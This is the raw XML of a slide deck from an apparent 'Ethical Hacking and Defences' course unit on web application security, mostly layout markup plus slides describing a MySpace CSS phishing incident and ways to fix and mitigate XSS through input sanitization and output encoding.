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64"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="473" r:id="rId3"/>
    <p:sldId id="468" r:id="rId4"/>
    <p:sldId id="474" r:id="rId5"/>
    <p:sldId id="475" r:id="rId6"/>
    <p:sldId id="360" r:id="rId7"/>
    <p:sldId id="358" r:id="rId8"/>
    <p:sldId id="466" r:id="rId9"/>
    <p:sldId id="517" r:id="rId10"/>
    <p:sldId id="469" r:id="rId11"/>
    <p:sldId id="451" r:id="rId12"/>
    <p:sldId id="467" r:id="rId13"/>
    <p:sldId id="454" r:id="rId14"/>
    <p:sldId id="455" r:id="rId15"/>
    <p:sldId id="470" r:id="rId16"/>
    <p:sldId id="471" r:id="rId17"/>
    <p:sldId id="472" r:id="rId18"/>
    <p:sldId id="476" r:id="rId19"/>
    <p:sldId id="478" r:id="rId20"/>
    <p:sldId id="520" r:id="rId21"/>
    <p:sldId id="518" r:id="rId22"/>
    <p:sldId id="477" r:id="rId23"/>
    <p:sldId id="519" r:id="rId24"/>
    <p:sldId id="447" r:id="rId25"/>
    <p:sldId id="459" r:id="rId26"/>
    <p:sldId id="498"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365" r:id="rId41"/>
    <p:sldId id="368" r:id="rId42"/>
    <p:sldId id="513" r:id="rId43"/>
    <p:sldId id="514"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516" r:id="rId61"/>
    <p:sldId id="521" r:id="rId62"/>
    <p:sldId id="51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99"/>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6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FBA7D-48B1-422E-81F4-1DF1DB2B14AA}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</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99A66-8ECF-43F7-8F92-429B407F8AE6}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315462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28600" y="4724400"/>
            <a:ext cx="8686800" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10784"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:no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228600" y="228600"/>
            <a:ext cx="8686800" cy="6152728"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2821"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="127000" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="53D2FF"/>
            </a:solid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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="533400"/>
            <a:ext cx="7924800" cy="4191744"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4800">
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="4800600"/>
            <a:ext cx="8534400" cy="160020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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="6553200"/>
            <a:ext cx="2133600" cy="287782"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{351F3A9A-32B4-4B5F-8CEB-00D2610D61C0}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="6553200"/>
            <a:ext cx="3429000" cy="287782"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>Ethical Hacking and Defences</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="6553200"/>
            <a:ext cx="2057400" cy="287782"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{841AA668-B864-4FD1-AF09-4B71522EA5AB}"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4404E9EE-18B7-46D1-8FC7-872300A64691}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="6400800" cy="6049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dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{84B8CEB9-9910-44AA-8CC3-CC2552DAC07D}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Round Same Side Corner Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4862513" y="2300287"/>
            <a:ext cx="6096000" cy="1952625"/>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orient="vert"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7029450" y="274638"/>
            <a:ext cx="1752600" cy="5973762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>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274638"/>
            <a:ext cx="8534400" cy="922114"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1268760"/>
            <a:ext cx="8534400" cy="51320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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F8E5FCD5-0BF8-45EB-81C0-31DF3330CF61}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</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dirty="0" smtClean="0"/>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ound Same Side Corner Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="228600"/>
            <a:ext cx="8686800" cy="4953000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2821"/>
              <a:gd name="adj2" fmla="val 0"/>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flipV="1">
            <a:off x="228600" y="5257800"/>
            <a:ext cx="8686800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10784"/>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685800" y="838200"/>
            <a:ext cx="7772400" cy="4191000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4800" b="0" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="5410200"/>
            <a:ext cx="7772400" cy="1042987"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F1E97AD1-D5BF-46CC-8E1F-4C3DF8561F6F}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</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301752"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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200"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2FABA7B6-F61A-4820-9B9A-5D3F7FE162F2}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</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301752"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301752"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body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645024"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4"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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0231E42-6DFC-4717-8DEF-6A776749950B}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>Ethical Hacking and Defences</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>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112CC73D-1A75-4F9B-9581-062EE3A70B8B}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>Ethical Hacking and Defences</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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p>
            <a:fld id="{287644B1-25AE-458A-8E2F-ED5C0431CD12}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>Ethical Hacking and Defences</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>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3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="8686800" cy="4724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3CC63961-C321-499F-8674-72111E2D33F6}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8"/>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 useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>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lgn="l">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Grp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1524000"/>
            <a:ext cx="8686800" cy="49103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Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E50AB02-61EE-4AF9-B5B9-96A8BE0B2EE6}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</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 useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>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Same Side Corner Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="152400"/>
            <a:ext cx="8686800" cy="144000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4902"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="53D2FF"/>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5344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8600" y="6520942"/>
            <a:ext cx="2133600" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{188AE6C1-1D78-4E3C-97DA-DDEAFB5D9E94}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="6520942"/>
            <a:ext cx="3429000" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>Ethical Hacking and Defences</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781800" y="6520942"/>
            <a:ext cx="2133600" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{841AA668-B864-4FD1-AF09-4B71522EA5AB}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="6524625"/>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dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="274320" indent="-274320" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buSzPct val="85000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="548640" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buSzPct val="85000"/>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2"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="128016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owasp.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Topic 6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Application Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ST251Y Ethical Hacking and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Defences</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{841AA668-B864-4FD1-AF09-4B71522EA5AB}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-S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attack on MySpace</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.caughq.org/advisories/CAU-2006-0001.txt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The hacker submitted Cascading Style Sheets (CSS) code in his profile page in MySpace which prevented the normal navigation menu from displaying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hacker created his own navigation menu on his profile page that looks like the original, but the Home button points to a fake login page created by hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users who visit his profile page and then click the Home button is presented with the fake login page. They enter their real usernames and passwords which are captured by the hacker</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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ways to fix the XSS vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Look for codes that takes input directly from user and post it back into the webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Perform data sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>. encode ‘&lt;‘ and ‘&gt;’ with &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Advanced XSS can escape simple encoding checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Use more stringent control: explicitly check for allowable characters instead</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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ways to mitigate</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> the XSS vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Most languages like ASP, JSP, PHP have functions that can be used to encode output for safe display in HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>&amp; becomes &amp;amp;</a:t>
            </a:r>
          </a:p>
